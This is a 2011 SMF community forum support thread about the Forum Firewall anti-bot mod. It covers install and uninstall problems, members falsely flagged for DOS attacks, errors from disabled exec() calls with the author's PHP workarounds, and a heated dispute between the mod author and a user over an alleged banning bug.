"%25" => "%"
"%23" => "#"
"%5B" => "["
"%5D" => "]"

FF was not designed to sanitize, that is the job of SMF et al (possibly Aeva).  FF is designed to block bad things.  The default intent to strictly adhere to internet standards.  This is why the hex encoded = is blocked.

The beauty of FF is that the admin can edit all the criterion and if they choose they can allow hex encoded ='s... relaxing the default intent.
8)
Title: Re: Forum Firewall
Post by: Kindred on May 01, 2011, 10:16:01 AM
what I am trying to say is that I saw = in the sessionID string... not a urlencoded = (%3d), an ACTUAL =.
Title: Re: Forum Firewall
Post by: teos55 on May 02, 2011, 06:57:26 AM
Hi to all,

  Running smf 1.1.13  and BB installed with default theme.  During apply stage I got the follwing error msg.

"Execute Modification   ./Themes/default/index.template.php   Test failed"

  I have the following line in ./Themes/default/index.template.php

theme_copyright() . get2by2host_copyright(),

   Read all the pages, but nobody reported such thing, most probably some other modification issue,  can you shed some light on this ?



nb1.  After some search,  it seems that "get2by2host_copyright()" comes from Twitter @anywhere.
  I removed it (the code from "global headers and footers while ago", but seems that code remained in template. Can it be that, mean if I remove it from template, then it will be a smooth inst ?

nb2.  w/o waiting for a reply i removed "get2by2host_copyright()", and now I'm installing the code.

So this case is closed.
Title: Re: Forum Firewall
Post by: butchs on May 02, 2011, 06:54:22 PM
Great job!!!
;)
Title: Re: Forum Firewall
Post by: Angelina Belle on May 03, 2011, 07:59:34 AM
Quote from: teos55 on May 02, 2011, 06:57:26 AM
w/o waiting for a reply i removed "get2by2host_copyright()", and now I'm installing the code.

Good job figuring out what was causing your install to fail -- but removing the copyright notice from the theme may mean you have now violated the licensing agreement on the theme. You should check with the theme provider. 

Now that the install has completed successfully, you should be able to put that copyright notice back in, and get right with your theme's provider.
Title: Re: Forum Firewall
Post by: teos55 on May 03, 2011, 10:45:14 AM
Sorry for missguiding.  I only removed the "get2by2host_copyright()" not the  "theme_copyright()". So the orijinal copyright is there
and FF is running in test mode., and will be for a while.
Title: Re: Forum Firewall
Post by: NanoSector on May 03, 2011, 11:48:41 AM
Quote from: teos55 on May 03, 2011, 10:45:14 AM
Sorry for missguiding.  I only removed the "get2by2host_copyright()" not the  "theme_copyright()". So the orijinal copyright is there
and FF is running in test mode., and will be for a while.
Still, the other part is copyright added by something, and needs to be intact to apply to the rules of that something.

Perhaps attach your index.template.php here so we can re-add it for you :)
Title: Re: Forum Firewall
Post by: Kindred on May 03, 2011, 11:56:25 AM
yoshi... you must not have readthe previous post...

Quote from: teos55 on May 02, 2011, 06:57:26 AM
nb1.  After some search,  it seems that "get2by2host_copyright()" comes from Twitter @anywhere.
  I removed it (the code from "global headers and footers while ago", but seems that code remained in template. Can it be that, mean if I remove it from template, then it will be a smooth inst ?


it was added by the twitter mod, which he removed...   but apparently the mod did not completely uninstall.
he's fine.
Title: Re: Forum Firewall
Post by: NanoSector on May 03, 2011, 11:58:28 AM
Quote from: Kindred on May 03, 2011, 11:56:25 AM
yoshi... you must not have readthe previous post...

Quote from: teos55 on May 02, 2011, 06:57:26 AM
nb1.  After some search,  it seems that "get2by2host_copyright()" comes from Twitter @anywhere.
  I removed it (the code from "global headers and footers while ago", but seems that code remained in template. Can it be that, mean if I remove it from template, then it will be a smooth inst ?


it was added by the twitter mod, which he removed...   but apparently the mod did not completely uninstall.
he's fine.
Heh, sorry, I need glasses :P
Title: Re: Forum Firewall
Post by: teos55 on May 03, 2011, 12:00:07 PM
Thanks for the translation :-)
Title: Re: Forum Firewall
Post by: Angelina Belle on May 03, 2011, 12:14:07 PM
My bad.  Sorry.
Title: Re: Forum Firewall
Post by: NanoSector on May 03, 2011, 12:28:11 PM
Quote from: AngelinaBelle on May 03, 2011, 12:14:07 PM
My bad.  Sorry.
Meh, I should have readed the whole conversation first :P

But this is getting OT.
Title: Re: Forum Firewall
Post by: butchs on May 04, 2011, 07:12:53 PM
Quote from: teos55 on May 03, 2011, 12:00:07 PM
Thanks for the translation :-)

Oooo...  What language??
Title: Re: Forum Firewall
Post by: teos55 on May 06, 2011, 01:41:59 PM
Recently installed FF tom my SMF 1.1.13

    It's been running in test mode for almost 7 days, 8 pages of log up to now mainly keep-alives and and I received following msg for one my members:
----------------------------------------------------------------------------------------
233   46.2.207.167   2011-05-06 18:21:10   GET /index.php?action=dlattach;topic=713.0;attach=7941;image HTTP/1.1 Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17 http://mysite/index.php?topic=713.msg4716   DOS Attack!
--------------------------------------------------------------------------------------------

IP adr 46.2.207.167 is for one of my members. Can it be virus on his machine ? I dont think he is digging around
(hopefully not)
Title: Re: Forum Firewall
Post by: butchs on May 07, 2011, 07:34:54 AM
Could be antivirus software...  I would not worry about it unless it happens too much.  If it does and he is not doing anything bad add him to the "Forum Firewall Whitelist Group" in Manage Permissions/General Permission" settings.

I added the Whitelist because my site has a member who accessed the site from work where he had a boat load of antivirus software.  Every day he will get banned for a DOS attack.  This option prevented that.
8)
Title: Re: Forum Firewall
Post by: teos55 on May 07, 2011, 07:00:07 PM
Thanks Butchs. I'll try your recommendation.
Title: Re: Forum Firewall
Post by: teos55 on May 12, 2011, 05:28:44 PM
  After running in test mode for a reasonable time, now I turrned "block violations" on.  Some members
blocked with reason being dos attack.

"88.246.126.246   2011-05-12 22:23:28   GET /index.php?action=dlattach;topic=687t.0;attach=8182 HTTP/1.1 Opera/9.80 (Windows NT 5.1; U; tr) Presto/2.2.15 Version/10.00 http://karavanturk.org/index.php   DOS Attack!"

  He ran antivirus software to clear up his pc, logged in after several hours then he is banned again  :-)

Any recommendation. I didnt see the whitelist in manage permission. I'm running smf 1.1.13 can this be the reason ?. I put his user name on the settings page of FF  in stead, for the time being and wathcing ...
Title: Re: Forum Firewall
Post by: butchs on May 12, 2011, 07:30:40 PM
Forum Firewall Whitelist Group is an option in SMF 1.1.x to prevent being blocked by DOS attacks, look at:

Admin/PERMISSIONS BY MEMBERGROUP/"select the group you want"/Forum Firewall Whitelist Group
8)
Title: Re: Forum Firewall
Post by: teos55 on May 13, 2011, 03:39:55 AM
     Found the option, I looked through main options rather then inside the membergroups, sorry.
Thanks ..

  Any other recommendation to set ?  like:
  ports, sql injection, cross site scripting , http header attacks . 

  Is it time to enable also these options ? Any consequences like heavy cpu usage, performance degradation and such ? Not too much members though around 100 .
 
Title: Re: Forum Firewall
Post by: teos55 on May 13, 2011, 11:31:52 AM
SMF 1.1.13  default theme  FF V1.0.10

  Transfered the site to another provider. Everything modified according to the new site,
one setting remaining, which is: Admin Domain name .

existing one in the format of  :   dsl88-246-56299.xxxxx.net.tr

Looking through the whois database, I couldn't find the proper field to enter.

Any guidance ?

Title: Re: Forum Firewall
Post by: butchs on May 13, 2011, 09:19:06 PM
This mod runs on minimal memory and CPU usage.  It is recommended to operate it in  logging mode for the first few days.

Quote from: teos55 on May 13, 2011, 11:31:52 AM
existing one in the format of  :   dsl88-246-56299.xxxxx.net.tr

If you clicked on the "?" the help would have explained that you use "xxxxx.net.tr".
:)
Title: Re: Forum Firewall
Post by: teos55 on May 19, 2011, 08:20:04 AM
  SMF 1.1.3  default theme Forum Firewall 1.0.10

  Some thing strange happening. I appiled the steps mentioned in : http://www.simplemachines.org/community/index.php?topic=434341.0

Then installed every before existing Mods one by one.  Forum Firewall implemented sucessfuly. I have it in
my admin menu, enabled, running, no errors in the error log.

After sometime ....
When when I look  admin > packages > installed packages , I didnt see Forum Firewall in the list. ???

- Then I checked /packages directory it was not in directory so I ftp'd previously downloaded forumfirewall zip
file from my computer to the /packages directory.  Up to now it's ok. When I do admin > packages > installed packages . it's there as installed.

- Planned to uninstall Forum Firewall ( since I want to change apply sequence of Mods , in order to apply
some new mods, which gives errors in php files, during applying)

  Now I get :

"Unable to find package file!" 

When I check the /packages dir, I see the timestamp is different then the others . Can this be the reason, or any other thing I made wrongly ? Any DB mismatch to check ?

nb. repair.settings.php  didnot solve the issue.


In order to test if my package manager has corrupted some way, I tested with installing 2 additional
packages. ( New topic in seperate color, Package Manager sort 1.0)

  All installed and functions properly.

  Right after that trying to uninstall Forum Firewall fails with : "Unable to find package file!"  again.

  Checked DB entries, there is only one entry : package_make_backups : 1 (enabled) that is all.

Where to look ???

Help please ...




Title: Re: Forum Firewall
Post by: Masterd on May 19, 2011, 12:14:55 PM
There's a BOM in Spanish Es UTF-8.
Title: Re: Forum Firewall
Post by: teos55 on May 19, 2011, 01:57:51 PM
 This is not the case, since I used file_check.php a few days ago,  corrected all BOM errors in my system.
Title: Re: Forum Firewall
Post by: żεχเ๏ภ on May 19, 2011, 02:10:46 PM
Hi all. Just upgraded from ForumFirewall 1.0.8 to 1.0.10 on SMF 1.1.xx...

I'm getting alot of this error on my homepage and in error log to do with forumfirewall...

xxxxx Today at 19:08
xx.xx.xx.xx.xx   63fbc681fef3dedb8f2d4dd6a4cb5f94
http://mainmedia.me/forum/index.php?action=forumfirewall;sa=settings;sesc
2: exec() has been disabled for security reasons
File: /web/users/xxxxx/forum/Sources/ForumFirewall-Admin.php
Line: 32


Is this my host's fault? What exactly does "exec" do..? >_> Thanks for your time and help.

Note: I wasn't getting any errors on ForumFirewall 1.0.8 and earlier.

Jason
Title: Re: Forum Firewall
Post by: teos55 on May 19, 2011, 02:45:16 PM
 In order to debug further, I need which firewall php is called upon "uninstall" is clicked next to Forum Firewall ,
on packager manager ?
Title: Re: Forum Firewall
Post by: butchs on May 20, 2011, 07:15:39 AM
Quote from: żεχเ๏ภ on May 19, 2011, 02:10:46 PM
Hi all. Just upgraded from ForumFirewall 1.0.8 to 1.0.10 on SMF 1.1.xx...

I'm getting alot of this error on my homepage and in error log to do with forumfirewall...
Is this my host's fault? What exactly does "exec" do..? >_> Thanks for your time and help.

There was an issue with some servers that lost or the users did not install the cache directory.  Exec was one method to check for its presence.  If the command is disabled on your server , the mod finds another way to check for the directory.

In conclusion, if you do not see any errors in the SMF error log you can ignore it.
Title: Re: Forum Firewall
Post by: butchs on May 20, 2011, 07:17:17 AM
Quote from: teos55 on May 19, 2011, 02:45:16 PM
In order to debug further, I need which firewall php is called upon "uninstall" is clicked next to Forum Firewall ,
on packager manager ?

Try uninstalling it using the advanced pane and simulate an older version of SMF.  Other than that this seems to be an SMF issue.
Title: Re: Forum Firewall
Post by: żεχเ๏ภ on May 20, 2011, 12:11:51 PM
Quote from: butchs on May 20, 2011, 07:15:39 AM
Quote from: żεχเ๏ภ on May 19, 2011, 02:10:46 PM
Hi all. Just upgraded from ForumFirewall 1.0.8 to 1.0.10 on SMF 1.1.xx...

I'm getting alot of this error on my homepage and in error log to do with forumfirewall...
Is this my host's fault? What exactly does "exec" do..? >_> Thanks for your time and help.

There was an issue with some servers that lost or the users did not install the cache directory.  Exec was one method to check for its presence.  If the command is disabled on your server , the mod finds another way to check for the directory.

In conclusion, if you do not see any errors in the SMF error log you can ignore it.

Hi, thanks for your response.

But I am getting an error on my homepage http://mainmedia.me/index.php as you can see, plus plenty in my error log.

So I guess what I am getting at is... Is there any way to disable the exec check function of the mod so the errors will stop?

Or should I contact my host and try to coax them into enabling exec for me? :o


Jason
Title: Re: Forum Firewall
Post by: teos55 on May 20, 2011, 12:15:39 PM
   Butcsh,

  Can you pls explain what "Try uninstalling it using the advanced pane and simulate an older version of SMF"

means ?  Especially advanced pane ?

All the best
Title: Re: Forum Firewall
Post by: KensonPlays on May 20, 2011, 12:22:22 PM
on the bottom right near the last package link "[delete]" is a link that says "Advanced" that's the advanced pane, click on it.
Title: Re: Forum Firewall
Post by: teos55 on May 20, 2011, 12:54:49 PM
  That is all I see on the "installed packages" screen.  There is no advanced in there.
And also in installed packages browse screen, no "advanced." 

even uninstalling "Sorted Package Manager Listing" mod.

Release related ?
Title: Re: Forum Firewall
Post by: butchs on May 20, 2011, 05:30:20 PM
Quote from: żεχเ๏ภ on May 20, 2011, 12:11:51 PM
Or should I contact my host and try to coax them into enabling exec for me? :o
Jason

The host did not have to make it such an error.
Title: Re: Forum Firewall
Post by: butchs on May 20, 2011, 05:36:25 PM
Quote from: teos55 on May 20, 2011, 12:54:49 PM
  That is all I see on the "installed packages" screen.  There is no advanced in there.
And also in installed packages browse screen, no "advanced." 

even uninstalling "Sorted Package Manager Listing" mod.

Release related ?

When mods are installed you need to track the order you install them so when you uninstall them it is not a big pain.  I suggest you try to uninstall each mod until you are eventually able to uninstall FF.

When you install them again I suggest your change the zipped file name to have a number on the end that will notify you of the order they were installed.  ie. 

special_mod_01.zip
another_mod_02.zip

and so on...

If the above is not possible then back-up your database, wipe out SMF and re-install SMF.  Then re-install the mods.  Check out the SMF support section for details.
Title: Re: Forum Firewall
Post by: busterone on May 20, 2011, 07:06:20 PM
teos55 is using 1.1.13.  Yes, the advanced button is SMF2.0 only ulesss you install the version emulation mod for 1.1.x found
here http://custom.simplemachines.org/mods/index.php?mod=2113
Title: Re: Forum Firewall
Post by: żεχเ๏ภ on May 21, 2011, 01:00:36 AM
Quote from: butchs on May 20, 2011, 05:30:20 PM
Quote from: żεχเ๏ภ on May 20, 2011, 12:11:51 PM
Or should I contact my host and try to coax them into enabling exec for me? :o
Jason

The host did not have to make it such an error.  Try this: 
Open Subs-ForumFirewall.php, on line 838 find
$ftest = exec("ls ".$ffcachedir);

replace with
//  $ftest = exec("ls ".$ffcachedir);

Cheers butch, problem solved.  :)


Jason

Edit: No more error on homepage it seems, but still getting this in error log... :( Sorry to keep bothering you.


Apply Filter: Only show the errors with the same message
2: exec() has been disabled for security reasons
File: /web/users/xxxxx/forum/Sources/ForumFirewall-Admin.php
Line: 32


Should I remove the line "$ftest = exec("ls ".$ffcachedir);" from ForumFirewall-Admin.php or will this break the mod? XD


Edit 2:

Tried removing "$ftest = exec("ls ".$ffcachedir);" from ForumFirewall-Admin.php...
Forum Firewall ffcache directory is missing
File: user


Now I'm getting this error. I think I'll just put it back <_<
Title: Re: Forum Firewall
Post by: teos55 on May 21, 2011, 03:59:24 AM
  Appreciate the info given Busterone,

1.1.RC1  behaves like 1.1.13   uninstall returns to package browse menu without any error notification.
1.1.RC2 and 1.1.RC3 lists Forum Firewall in " Not Uninstallable (no uninstall section for this version of SMF)"

  Seems I'll perform a manual uninstall for it, should I execute uninstall_db.php  after removal code parts from
effected phps ?

All the best
Title: Re: Forum Firewall
Post by: teos55 on May 21, 2011, 06:09:18 AM
   I successfuly uninstalled doing a manual one, according to parse instructions. It took me several hours,but worth doing.

All the best
Title: Re: Forum Firewall
Post by: butchs on May 21, 2011, 07:33:55 AM
I am sorry it was such a hassle and I am glad you have it resolved.

I had the same thing happen to me when I double installed a mod by accident.
Title: Re: Forum Firewall
Post by: teos55 on May 21, 2011, 07:43:52 AM
  Most probably I've done something wrong between installing and uninstalling mods, so this happened.

Maybe it's due to my deletion of spanish related language files and modification.spanish...   files since
I thought I dont need them and uninstall couldnot find those files hence returned to browse package again
w/o any error, I dont know.  Expected a "not found" warning, but not.

  Your suggestion numbering mods zip files with apply sequence is a good one, but it should be done right after first mod applied to the pristine smf installation, I think. I dont dare to do it right now, since it may cause confusion with the package manager.

  Now , I think everything is undercontrol :-)  I Hope ...
Title: Re: Forum Firewall
Post by: żεχเ๏ภ on May 22, 2011, 01:29:07 AM
Quote from: butchs on May 21, 2011, 07:39:22 AM
Quote from: żεχเ๏ภ on May 21, 2011, 01:00:36 AM
Should I remove the line "$ftest = exec("ls ".$ffcachedir);" from ForumFirewall-Admin.php or will this break the mod? XD


Edit 2:

Tried removing "$ftest = exec("ls ".$ffcachedir);" from ForumFirewall-Admin.php...
Forum Firewall ffcache directory is missing
File: user


Now I'm getting this error. I think I'll just put it back <_<


If the ffcache directory is in your root directory then delete this from ForumFirewall-Admin.php:
$ftest = '';
$ftest = exec("ls ".$ffcachedir);
if (empty($ftest)) $ftest = is_dir($ffcachedir);
if (empty($ftest)) {
if (function_exists('loadlanguage')) {
if(loadlanguage('Errors') === false)
      loadLanguage('Errors');
} else {
require_once($sourcedir . '/Load.php');
if(loadlanguage('Errors') === false)
        loadLanguage('Errors'); }

log_error($txt['cfcachef'], 'user');
}


Problem solved, no more errors, cheers.
Title: Re: Forum Firewall
Post by: Smog on May 22, 2011, 10:00:16 AM
FF Copyright info & link overwrites the SMF Copyright info & link
Title: Re: Forum Firewall
Post by: butchs on May 22, 2011, 11:50:49 AM
Not on the default theme.

Sounds like something has been changed.
Title: Re: Forum Firewall
Post by: Smog on May 22, 2011, 11:53:46 AM
Installed on a 2.0 RC1.2 board.

BTW, what's the code related to FF in index.template.php I have to look for?
Title: Re: Forum Firewall
Post by: butchs on May 22, 2011, 12:50:51 PM
The FF copyright should stay unless you made a donation.

Those who have can PM me for info.
Title: Re: Forum Firewall
Post by: Smog on May 22, 2011, 12:59:10 PM
I'm NOT talking about removing the FF copyright, I'm only asking for the code so I can move it 1 line BELOW the SMF Copyright, ok?
Title: Re: Forum Firewall
Post by: Smog on May 22, 2011, 02:29:01 PM
Never mind, code in index.template.php is

FFCopyright(),

Fixed the prob.
Title: Re: Forum Firewall
Post by: harry66 on May 30, 2011, 12:00:21 PM
Hi,

i have a Problem with the Forum Firewall (2.0 RC5)

After i save settings in Firewall configuration i get some errors in the error protocol

5 times:
exec() has been disabled for security reasons


Whats the problem? How can i solve this? Am i right that the Firewall is not working because of this error?


best regards
Title: Re: Forum Firewall
Post by: butchs on May 30, 2011, 03:17:51 PM
It is working, read reply 384 and back.
Title: Re: Forum Firewall
Post by: yakyakyak on May 31, 2011, 08:56:42 AM
RC3 and all installed fine with 1 minor edit

So far looking good but running scnforumfirewall produces an internal server error ???
Title: Re: Forum Firewall
Post by: butchs on May 31, 2011, 04:26:39 PM
You can disable the FF "scn" in Scheduled tasks.  Please PM me the error as I am working on a new release to go with 2.0 gold and will try to squeeze it in...
Title: Re: Forum Firewall
Post by: yakyakyak on June 01, 2011, 03:34:19 AM
Quote from: butchs on May 31, 2011, 04:26:39 PM
You can disable "scnforumfirewall" in Scheduled tasks.  Please PM me the error as I am working on a new release to go with 2.0 gold and will try to squeeze it in...


Would you believe it - it's working this morning and nothing has been changed ???
Title: Re: Forum Firewall
Post by: Ruediger63 on June 14, 2011, 03:26:35 AM
Hello,

i need german Lang for the Firewall
Title: Re: Forum Firewall
Post by: eric1234 on June 14, 2011, 06:44:10 AM
In visitor report, it state something just like in the picture. What does that mean?

Title: Re: Forum Firewall
Post by: butchs on June 14, 2011, 08:25:27 PM
That was discussed before.  Spammers spoofing the ip address.
8)
Title: Re: Forum Firewall
Post by: spiros on June 23, 2011, 02:57:56 PM
Does it work with 2 Final?
Title: Re: Forum Firewall
Post by: butchs on June 23, 2011, 07:49:55 PM
Yes  Could use a translation???  Hint hint hint...
:-X
Title: Re: Forum Firewall
Post by: R-one on June 24, 2011, 01:01:46 AM
just to let you know..

I installed this mod and ran it as advised, in testing mode for a few days.

I decided against activating it as it was a little overpowered for my particular forum.
without having ever activated the actual blocking, I uninstalled it.

it was during the uninstall that the mod went ahead and banned every IP/member that was in the log for DOS Attacks during the testing duration.

this is a quite harmful bug as most people will not realize this has occured until the number of online members drops dramatically after uninstallation.

please reply with why this happened?

I am using 2.0 gold and no other related mods.

thank you.
Title: Re: Forum Firewall
Post by: spiros on June 24, 2011, 01:41:36 AM
I noticed like a 60% decrease in stats since installing it... how do you check whether it has banned IPs?
Title: Re: Forum Firewall
Post by: R-one on June 24, 2011, 02:15:34 AM
in your Admin section under the 'members' area.. there is the Ban List

check in there.
you will likely find a whole lot of people who are banned for reasons like 'DOS Attack' or Geo IP etc..

i do not recommend this mod unless you are very very vigilant and know exactly what you are doing.
like I said, it is overpowered for a lot of medium sized forums.
Title: Re: Forum Firewall
Post by: butchs on June 24, 2011, 07:45:30 PM
R-one, I call BS,  there is no bug in the mod.  The mod will work if when you follow instructions and ask questions when you are confused.  It is obvious that you did not set up the mod correctly.  Do not select GeoIP unless you have conformed it is working.  Try again after you get experience.

Quote from: spiros on June 24, 2011, 01:41:36 AM
I noticed like a 60% decrease in stats since installing it... how do you check whether it has banned IPs?

That is good, if set up correctly you removed the spam traffic to your site that has no value.  All banned ip's are in the visitor list when logging is enabled.
Title: Re: Forum Firewall
Post by: R-one on June 24, 2011, 08:02:29 PM
gettin your back up a bit there aren't ya bloke?

I have been modifying and contributing to smf for years. i'm not some half baked pleb.

i installed your mod. without error. ran it under TEST MODE only.. for a few days. monitored the logs and noticed that it was calling
DOS Attack on people I know personally who were doing something as basic as checking their PMs.
I decided against activating it..
then uninstalled it. without error.
and BAM it bans everyone in the logs.

that my snappy little friend.. smacks of 'bug' now doesn't it?

instead of defending your mod into the ground.. why don't YOU ask the questions and see if you can't replicate the issue and fix it?
Title: Re: Forum Firewall
Post by: butchs on June 24, 2011, 08:13:17 PM
No bug, you ran the "Geo IP" feature even though it does not work on your site.  Then there is the whitelist feature that is meant for all good members.  You should have asked the question before you calmed fault.

The mod will not ban anyone after uninstallation.  Are you are smoking something?  When a mod is uninstalled, it will do nothing.  Who do you work for the spam bots?
Title: Re: Forum Firewall
Post by: R-one on June 24, 2011, 08:31:49 PM
nice attitude you have there.

i will repeat it for the third time.
i never actually activated the mod. it never made it out of test mode.
Therefore I should have been able to tick and untick every option under the sun.. for the purpose of 'testing'
without any members being banned whatsoever.

which is what it did.
until uninstallation.
the point at which your fantastic bug free top heavy completely unnecessary mod.. banned everyone in the monitor log anyway.

and for your information I am aware of what GeoIP is for and how it works.
Believe it or not, you're not the only one out there with two eyes and half a brain.

Only you seem to have inherited a healthy dose of arrogance to boot.
Title: Re: Forum Firewall
Post by: R-one on June 24, 2011, 08:32:27 PM
at the very least..

AVOID THIS MOD for the attitude of its author.

bye bye
Title: Re: Forum Firewall
Post by: butchs on June 25, 2011, 06:39:13 AM
I treat others as they treat me.  I spent 12 months developing this mod.  I was not paid to do it.  I did it for one reason to stop bots.  This the mod does well...

The only one here with the attitude is R-one.  You come to this thread and post that you did not like the mod and uninstalled it, do not use it.  You are spamming this thread.  If you wanted support you could have asked for it.  But instead you opt to bash the mod.

It is impossible for the mod to BAN everyone during uninstallation.  As per SMF policy when a mod is uninstalled all code is completely removed and all the files are deleted 100%.

There is no code in the mod that reviews the visitor log or does anything with the log.  The log is for display purposes only!  Nothing else.  Data from the log is not used to ban anyone.

Your problem is unrelated to the mod.

I know for a fact that my mods are effective.  They stop bots in their tracks.  The spam bot users can not go around them.  The spam bots operators loose money.  Spam bot users fear my mods and will do whatever they can to keep people from using them.  They have trashed this and my other threads before.  They jump on here and claim it does not work, do not use this mod.  It will destroy your life.  It is true they do not want you to use the mod.  But the real reason is that it is destroying their income.

Sorry Spam Bot Operators but your words are mere advertisements...  Go away and pester VB!
8)
Title: Re: Forum Firewall
Post by: butchs on June 25, 2011, 07:54:42 AM
All please remember that this mod is free.  Donations are optional.  To date I have just four donations for all my mods combined.  I spent thousands upon thousands of hours working on this mod to stop the bot assault.  I could have easily kept it for myself and not shared it with the world.  I do not mind helping people.  I enjoy solving problems.  So, unless you plan to leave a donation leave the attitude at the front door.

I have better things to do with my abilities than deal with snotty bot users and punks who think I work for them.  Maybe I will simply stop all public work on the mod.  Then the bots will have the freedom to trash your bandwidth and force you to pay more for your hosting.

My mods were first developed for me.  It is from the kindness of my heart I share them with everyone.  There is no reason for attitude.
Title: Re: Forum Firewall
Post by: butchs on June 25, 2011, 08:06:09 AM
Quote from: spiros on June 24, 2011, 01:41:36 AM
I noticed like a 60% decrease in stats since installing it... how do you check whether it has banned IPs?

Let me rephrase my answer.  There are two modes in the mod:  blocking and banning.  Blocking is enabled via "Block Violations".  Banning is enabled via "Longterm Ban" not set to "NEVER" and "DOS Attack" enabled (and "Block Violations" enabled in version 1.1.1 and greater).  You can also have emails set to you when someone is banned.

Both Blocked and Banned users are all listed in the "Visitors" log of the mod.  Banned users are in "Admin/members/Ban List".

The banning feature should be used after you adjust your Robots.txt, Google, Yahoo and MSN webmaster good bot hit rates and you are not using another mods with poor code that use excessive bandwidth.

A 60% decrease in stats is a good thing.  The purpose of these type of mods is to reduce the bad traffic to your site.
Title: Re: Forum Firewall
Post by: MattH41 on June 25, 2011, 03:18:03 PM
Whenever I try to install this I get

Fatal error: Cannot redeclare make_seed() (previously declared in /home/matth41/public_html/altmarket/Sources/bad-behavior/BadBehavior-SMF.php:601) in /home/matth41/public_html/altmarket/Packages/temp/install_db.php on line 380

Trying to install it again at http://altmarket.net on SMF 2.0. I previously had this running back on an RC, but for some reason I can't get it installed again.
Title: Re: Forum Firewall
Post by: butchs on June 25, 2011, 03:29:53 PM
I look into it.
Title: Re: Forum Firewall
Post by: MattH41 on June 25, 2011, 11:25:57 PM
Thanks butchs! I'll keep checking back for the solution!
Title: Re: Forum Firewall
Post by: butchs on June 26, 2011, 06:41:24 AM
Quote from: MattH41 on June 25, 2011, 11:25:57 PM
Thanks butchs! I'll keep checking back for the solution!

I just returned. Should have something soon.
Title: Re: Forum Firewall
Post by: butchs on June 26, 2011, 07:51:27 AM
Some obscure bug fixes and idiot switch added.

R-one - vbgamer45 charges big bucks for mods like this.  This mod is free.  Donations are welcome.  Be kind to the "free" mod author.
Title: Re: Forum Firewall
Post by: butchs on June 26, 2011, 11:50:40 AM
Ooops.  There was an error in 1.1.1's download this morning.  It is fixed now.  Sorry.
Title: Re: Forum Firewall
Post by: Bancherd on June 26, 2011, 06:29:29 PM
Hmm...not sure what happened, I got blank screen when trying to install.  Same blank screen when trying to reinstall 1.1.0  :(

Could it conflict with other mods?  I have

+ PortaMx
+ Bad Behavior
+ KeyCaptcha
+ Join Date
+ Share this topic
+ Stop Spammer
+ Simple Audio and video
+ Tagging system
+ Display signature only once.

KeyCaptcha was the last mod installed prior to updating to Forum Firewall 1.1.1(from 1.1.0)

Thanks.
Title: Re: Forum Firewall
Post by: butchs on June 26, 2011, 06:52:04 PM
Yea,  the version of 1.1.1 I uploaded first thing in the morning had that error.  Try re-downloading 1.1.1.  It should work now.  Sorry, the new SMF filters are tricky.
Title: Re: Forum Firewall
Post by: Chaser98 on June 27, 2011, 07:20:13 PM
Whenever I click 'Settings' in admin panel on Forum Firewall, it redirects my to my site index page. I have drupal installed on site root, and forum on /forum directory. Please help.
Title: Re: Forum Firewall
Post by: butchs on June 27, 2011, 07:37:12 PM
Eieow...  Looks like a tuff one.  Here is my guess:  :o

I suspect your paths are off.

If you hover the mouse over the word setting you should see something like:

http://www.yoursite.com/???/index.php?action=admin;area=forumfirewall;sa=settings

The bold part should be the same one you see when you are in the admin page.

Check and see if the path is correct.  Then review: Admin/Server Settings/DATABASE AND PATHS

and confirm the paths are set correct there.

Title: Re: Forum Firewall
Post by: Chaser98 on June 27, 2011, 07:41:47 PM
I double checked my paths and they are correct, however I did find this in visitor log...

Invalid Admin
IP: (my ip)

It logs that whenever I try to access the settings. :S
Title: Re: Forum Firewall
Post by: butchs on June 27, 2011, 08:49:14 PM
Seems weird to me...  Is your Settings.php the same form version as your forum?

Maybe you enabled the mod before testing.

If so you will need to uninstall the mod and reinstall the mod.  Uninstalling the mod turns it off.  Before you enable the mod again make sure that you disable "Enable Bypass Protection" and fix the settings when banning is turned off.

If that does not disable the mod then you will need to get into phpmyadmin, find SMF_"settings" and change "forumfirewall_enable' to zero.
Title: Re: Forum Firewall
Post by: Storman™ on June 28, 2011, 09:07:00 AM
Hi, when users try to attach images etc, FF sometimes treats it as a DOS attack:

QuoteIP Address xx.xx.xx.xx, DOS Attack!
for /index.php?action=dlattach;topic=10622.0;attach=6622;image

Any ideas ?    ;)
Title: Re: Forum Firewall
Post by: butchs on June 28, 2011, 07:05:35 PM
Why don't you whitelist all your users with more than 20 posts?  This mod is more or less for guests and short time members who have ill intent for your site.  The whitelist is available so that you do not DOS block your regular members.  Go to "Admin/Permissions/Manage Permissions/Membergrtoup" and set "Forum Firewall Whitelist Group" to Allow.

As per the help "?" icon
QuoteThis option will make a member group exempt from the Forum Firewall bandwidth check. This group will not to be tested for Forum Firewall DOS attempts.

The mod will still protect you from regular members who try to hack your site.
Title: Re: Forum Firewall
Post by: Darkness_Black on July 01, 2011, 07:01:12 PM
Hi translating for mod and portuguese_brazilian, portuguese_brazilian-utf8, portuguese_pt, portuguese_pt-utf8 Mod is updated
Title: Re: Forum Firewall
Post by: butchs on July 01, 2011, 07:39:24 PM
Sweet...    8)
Title: Re: Forum Firewall
Post by: Storman™ on July 02, 2011, 05:09:35 PM
QuoteWhy don't you whitelist all your users with more than 20 posts?  This mod is more or less for guests and short time members who have ill intent for your site.  The whitelist is available so that you do not DOS block your regular members.  Go to "Admin/Permissions/Manage Permissions/Membergrtoup" and set "Forum Firewall Whitelist Group" to Allow.

Of course ! I knew that existed but didn't put 2 + 2 together, doh.....  (http://i307.photobucket.com/albums/nn281/joenest/doh.gif)

Cheers  ;)
Title: Re: Forum Firewall
Post by: Storman™ on July 03, 2011, 04:24:52 AM
Can you advise on how to add entries to the user agent white list ?

Should they be one per line like this:

Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Mobile/7D11
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/6531.22.7
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A306 Safari/6531.22.7


or should they be like this with "|" in between each entry:

